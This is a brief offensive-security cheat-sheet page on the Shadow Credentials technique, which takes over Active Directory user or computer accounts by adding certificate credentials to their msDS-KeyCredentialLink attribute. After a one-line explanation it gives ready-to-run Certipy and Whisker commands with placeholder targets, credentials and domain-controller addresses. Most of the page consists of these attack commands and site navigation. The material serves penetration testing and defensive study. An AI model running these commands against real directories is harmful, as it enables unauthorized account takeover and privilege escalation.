Shadow Credentials

Last modified: 2023-12-14

Shadow Credentials is an attack technique to take over Active Directory user/computer account by compromising msDS-KeyCredentialLink property of target objects.

Exploit

If the attacker can modify the target object's (user or computer account) attribute msDS-KeyCredentialLink and append it with alternate credentials in the form of certificates, he takes over the account in AD.

Using Certipy

# -k: Use Kerberos authentication
certipy shadow auto -account "targetuser" -u "username@example.local" -p 'password' -dc-ip 10.0.0.1 -target dc.example.local -k

Using Whisker

Whisker is a C# tool for taking over Active Directory user and computer accounts by manipulating their msDS-KeyCredentialLink attribute.

Whisker.exe add /target:john /domain:example.local

References

https://www.ired.team/offensive-security-experiments/active-directory-kerberos-abuse/shadow-credentials

Active Directory

Protocol

Service

Privilege Escalation

Post Exploitation

Forensics

PowerShell

WSL

Technique

Shadow Credentials

Exploit

Using Certipy

Using Whisker

References

ON THIS PAGE